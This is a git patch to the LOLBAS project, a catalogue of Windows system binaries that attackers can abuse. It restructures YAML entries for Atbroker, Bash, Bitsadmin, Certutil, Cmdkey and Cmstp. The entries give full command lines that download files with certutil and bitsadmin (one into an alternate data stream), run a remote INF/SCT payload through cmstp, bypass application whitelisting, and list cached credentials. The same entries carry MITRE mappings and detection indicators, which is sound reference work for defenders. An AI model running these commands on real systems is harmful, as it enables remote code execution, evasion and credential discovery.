From adafa6de3f98d21801a69bcf66665b9bb82e3760 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Sep 2018 01:50:14 +0200 Subject: [PATCH] Update readme, began updating OSBins with new template --- README.md | 55 ++++++------ yml/{ => LOLUtilz}/OtherBinaries/AcroRd32.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Gpup.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Nlnotes.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Notes.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Nvudisp.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Nvuhda6.yml | 0 .../OtherBinaries/ROCCAT_Swarm.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Setup.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Usbinst.yml | 0 .../OtherBinaries/VBoxDrvInst.yml | 0 yml/OSBinaries/Atbroker.yml | 33 +++++--- yml/OSBinaries/Bash.yml | 38 ++++++--- yml/OSBinaries/Bitsadmin.yml | 83 ++++++++++++------- yml/OSBinaries/Certutil.yml | 63 ++++++++++---- yml/OSBinaries/Cmdkey.yml | 34 +++++--- yml/OSBinaries/Cmstp.yml | 49 +++++++---- 17 files changed, 234 insertions(+), 121 deletions(-) rename yml/{ => LOLUtilz}/OtherBinaries/AcroRd32.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Gpup.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Nlnotes.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Notes.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Nvudisp.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Nvuhda6.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/ROCCAT_Swarm.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Setup.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Usbinst.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/VBoxDrvInst.yml (100%) diff --git a/README.md b/README.md index 69a808a..7c76813 100644 --- a/README.md +++ b/README.md @@ -17,9 +17,10 @@ Primarily files that offer "extra" functionality. ## Definition -* Must be a Microsoft signed file. (OS or downloaded from Microsoft site) +* Must be a Microsoft signed file. (Native to the OS or downloaded from Microsoft site) * Only extra "unexpected" functionality is interesting (Not interesting to document what it was intended for) * Exceptions are Application Whitelisting bypasses +* Primary focus is stuff that can be leveraged by APT or in Red Teaming * Functionality can include: * Executing code @@ -48,14 +49,15 @@ We generate the MD files from this and later it will also be the base for an upc ## STORY -"Living off the land" was coined by Matt Graeber - @mattifestation <3 -One of the first "Living Off The Land" talks (That I know of) is this one: +"Living off the land" was coined by Christopher Campbell (@obscuresec) & Matt Graeber (@mattifestation) +One of the first "Living Off The Land" talks is this one: https://www.youtube.com/watch?v=j-r6UonEkUw -The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here: +The term LOLBins came from a twitter discussion on what to call these binaries that can be used by an attacker to perform other actions than what the binary was designed to do. +LOLBins was first proposed by Philip Goh (@MathCasualty) here: https://twitter.com/MathCasualty/status/969174982579273728 -The term LOLScripts came from Jimmy - @bohops: +The term LOLScripts came from Jimmy (@bohops): https://twitter.com/bohops/status/984828803120881665 Common hashtags for these files are: @@ -71,7 +73,7 @@ A "highly scientific poll" was also conducted to agree (69% yes) on the name LOL https://twitter.com/Oddvarmoe/status/985432848961343488 The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you) - +The domain http://lolbas-project.com has been registered by Jimmy (@bohops). (Thanks!) The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man! Love this logo: @@ -82,33 +84,36 @@ Love this logo: All features are added to the issues in this repo. ### 1.0 -* Hosted https://github.com/api0cradle/LOLBAS/ -* Only MD files +- [x] Hosted https://github.com/api0cradle/LOLBAS/ +- [x] Only MD files ### 2.0 -- Current -* Hosted here on this repo -* Everything converted to YML files -* MD files generated from YML files -* Clearer definition -* Management scripts - +- [x] Moved from api0cradle and hosted here on this repo (https://github.com/LOLBAS-Project/LOLBAS) +- [x] Everything converted to YML files +- [x] MD files generated from YML files +- [x] Clearer definition of a LOLBin +- [ ] Management scripts +- [x] New template + ### 2.1 -* More categories -* Jekyll frontend -* Privileges required +- [ ] Migration to new template +- [ ] More categories - Part of the new template +- [ ] ATT&CK Mitre mapping +- [ ] Privileges required by binary +- [ ] Jekyll frontend + ### 2.2 -* ATT&CK Mitre mapping -* LOLBIN GUID - Unique ID for each bin -* Sub-Categories - * Signed executing unsigned - * Signed executing signed -* Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s ; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf +- [ ] LOLBIN GUID - Unique ID for each bin +- [ ]Sub-Categories + - [ ] Signed executing unsigned + - [ ] Signed executing signed + - [ ] Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s ; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf ### 2.3 -* Tests for PRs to ensure fields are valid -* Provide the project in DB format (sqlite) \ No newline at end of file +- [ ] Tests for PRs to ensure fields are valid +- [ ]Provide the project in DB format (sqlite) \ No newline at end of file diff --git a/yml/OtherBinaries/AcroRd32.yml b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml similarity index 100% rename from yml/OtherBinaries/AcroRd32.yml rename to yml/LOLUtilz/OtherBinaries/AcroRd32.yml diff --git a/yml/OtherBinaries/Gpup.yml b/yml/LOLUtilz/OtherBinaries/Gpup.yml similarity index 100% rename from yml/OtherBinaries/Gpup.yml rename to yml/LOLUtilz/OtherBinaries/Gpup.yml diff --git a/yml/OtherBinaries/Nlnotes.yml b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml similarity index 100% rename from yml/OtherBinaries/Nlnotes.yml rename to yml/LOLUtilz/OtherBinaries/Nlnotes.yml diff --git a/yml/OtherBinaries/Notes.yml b/yml/LOLUtilz/OtherBinaries/Notes.yml similarity index 100% rename from yml/OtherBinaries/Notes.yml rename to yml/LOLUtilz/OtherBinaries/Notes.yml diff --git a/yml/OtherBinaries/Nvudisp.yml b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml similarity index 100% rename from yml/OtherBinaries/Nvudisp.yml rename to yml/LOLUtilz/OtherBinaries/Nvudisp.yml diff --git a/yml/OtherBinaries/Nvuhda6.yml b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml similarity index 100% rename from yml/OtherBinaries/Nvuhda6.yml rename to yml/LOLUtilz/OtherBinaries/Nvuhda6.yml diff --git a/yml/OtherBinaries/ROCCAT_Swarm.yml b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml similarity index 100% rename from yml/OtherBinaries/ROCCAT_Swarm.yml rename to yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml diff --git a/yml/OtherBinaries/Setup.yml b/yml/LOLUtilz/OtherBinaries/Setup.yml similarity index 100% rename from yml/OtherBinaries/Setup.yml rename to yml/LOLUtilz/OtherBinaries/Setup.yml diff --git a/yml/OtherBinaries/Usbinst.yml b/yml/LOLUtilz/OtherBinaries/Usbinst.yml similarity index 100% rename from yml/OtherBinaries/Usbinst.yml rename to yml/LOLUtilz/OtherBinaries/Usbinst.yml diff --git a/yml/OtherBinaries/VBoxDrvInst.yml b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml similarity index 100% rename from yml/OtherBinaries/VBoxDrvInst.yml rename to yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index af73012..6709551 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -1,20 +1,29 @@ --- Name: Atbroker.exe -Description: Execute -Author: '' +Description: Helper binary for Assistive Technology (AT) +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: ATBroker.exe /start malware Description: Start a registered Assistive Technology (AT). + Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\Atbroker.exe - - C:\Windows\SysWOW64\Atbroker.exe -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\Atbroker.exe + - path: C:\Windows\SysWOW64\Atbroker.exe +Code Sample: +- Code: +Detection: + - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration + - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs + - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware Resources: - - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ -Notes: > - Thanks to Adam - @hexacorn - Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. - + - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ +Acknowledgement: + - Person: Adam + Handle: '@hexacorn' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 9f61b57..8611056 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -1,17 +1,35 @@ --- Name: Bash.exe -Description: Execute -Author: '' +Description: File used by Windows subsystem for Linux +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: bash.exe -c calc.exe - Description: Execute calc.exe. + Description: Executes calc.exe from bash.exe + Usecase: Performs execution of specified file, can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 + - Command: bash.exe -c calc.exe + Description: Executes calc.exe from bash.exe + Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 Full Path: - - '?' -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\bash.exe + - path: C:\Windows\SysWOW64\bash.exe +Code Sample: +- Code: +Detection: + - IOC: Child process from bash.exe Resources: - - '' -Notes: Thanks to ? - + - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +Acknowledgement: + - Person: Alex Ionescu + Handle: '@aionescu' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 61ef57d..637331a 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -1,36 +1,59 @@ --- -Name: Bitsadmin.exe -Description: Execute, Download, Copy, Read ADS -Author: '' +Name: bitsadmin.exe +Description: Used for managing background intelligent transfer +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: | - bitsadmin /create 1 - bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe - bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL - bitsadmin /RESUME 1 - bitsadmin /complete 1 - - Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. - - Command: | - bitsadmin /create 1 - bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe - bitsadmin /RESUME 1 - bitsadmin /complete 1 + - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 + Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. + Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique. + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. - - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset - Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. - - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset - Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset + Description: Command for copying cmd.exe to another folder + Usecase: Copy file + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset + Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. + Usecase: Execute binary file specified. Can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\Windows\System32\bitsadmin.exe - - c:\Windows\SysWOW64\bitsadmin.exe -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\bitsadmin.exe + - path: C:\Windows\SysWOW64\bitsadmin.exe +Code Sample: +- Code: +Detection: + - IOC: Child process from bitsadmin.exe + - IOC: bitsadmin creates new files + - IOC: bitsadmin adds data to alternate data stream Resources: - - https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - - Slide 53 - - https://www.youtube.com/watch?v=_8xJaaQlpBo - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe - + - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 + - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Rob Fuller + Handle: '@mubix' + - Person: Chris Gates + Handle: '@carnal0wnage' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 9f88e41..daf8482 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -1,25 +1,56 @@ --- Name: Certutil.exe -Description: Download, Add ADS, Decode, Encode -Author: '' +Description: Windows binary used for handeling certificates +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe Description: Download and save 7zip to disk in the current folder. - - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt Description: Download and save a PS1 file to an Alternate Data Stream (ADS). - - Command: | - certutil -encode inputFileName encodedOutputFileName - certutil -decode encodedInputFileName decodedOutputFileName - Description: Commands to encode and decode a file using Base64. + Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream + Category: Alternate data streams + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil -encode inputFileName encodedOutputFileName + Description: Command to encode a file using Base64 + Usecase: Encode files to evade defensive measures + Category: Encode + Privileges: User + MitreID: T1027 + MitreLink: https://attack.mitre.org/wiki/Technique/T1027 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil -decode encodedInputFileName decodedOutputFileName + Description: Command to decode a Base64 encoded file. + Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + MitreLink: https://attack.mitre.org/wiki/Technique/T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\certutil.exe - - c:\windows\sysWOW64\certutil.exe -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\certutil.exe + - path: C:\Windows\SysWOW64\certutil.exe +Code Sample: +- Code: +Detection: + - IOC: Certutil.exe creating new files on disk + - IOC: Useragent Microsoft-CryptoAPI/10.0 + - IOC: Useragent CertUtil URL Agent Resources: - - https://twitter.com/Moriarty_Meng/status/984380793383370752 - - https://twitter.com/mattifestation/status/620107926288515072 -Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016 - + - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 + - Link: https://twitter.com/mattifestation/status/620107926288515072 +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Moriarty + Handle: '@moriarty2016' +--- diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index a87826d..045e72d 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -1,18 +1,28 @@ --- -Name: Cmdkey.exe -Description: Credentials -Author: '' +Name: Cmdkey.exe +Description: creates, lists, and deletes stored user names and passwords or credentials. +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: cmdkey /list - Description: List cached credentials. + Description: List cached credentials + Usecase: Get credential information from host + Category: Credentials + Privileges: User + MitreID: T1078 + MitreLink: https://attack.mitre.org/wiki/Technique/T1078 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\cmdkey.exe - - c:\windows\sysWOW64\cmdkey.exe -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\cmdkey.exe + - path: C:\Windows\SysWOW64\cmdkey.exe +Code Sample: +- Code: +Detection: + - IOC: Usage of this command could be and IOC Resources: - - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation -Notes: '' - + - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation + - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey +Acknowledgement: + - Person: + Handle: +--- \ No newline at end of file diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 014e7b2..895e235 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -1,26 +1,43 @@ --- Name: Cmstp.exe -Description: Execute, UACBypass -Author: '' +Description: Installs or removes a Connection Manager service profile. +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. + Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. + Category: Execute + Privileges: User + MitreID: T1191 + MitreLink: https://attack.mitre.org/wiki/Technique/T1191 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. + Usecase: Execute code hidden within an inf file. Execute code directly from Internet. + Category: AwL bypass + Privileges: User + MitreID: T1191 + MitreLink: https://attack.mitre.org/wiki/Technique/T1191 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\system32\cmstp.exe - - C:\Windows\sysWOW64\cmstp.exe -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\cmstp.exe + - path: C:\Windows\SysWOW64\cmstp.exe +Code Sample: +- Code: +Detection: + - IOC: Execution of cmstp.exe should not be normal unless VPN is in use + - IOC: Cmstp.exe communication towards internet and getting files Resources: - - https://twitter.com/NickTyrer/status/958450014111633408 - - https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 - - https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e - - https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ - - https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 - (UAC Bypass) - - https://github.com/hfiref0x/UACME -Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer - + - Link: https://twitter.com/NickTyrer/status/958450014111633408 + - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 + - Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e + - Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ + - Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 + - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' + - Person: Nick Tyrer + Handle: '@NickTyrer' +--- \ No newline at end of file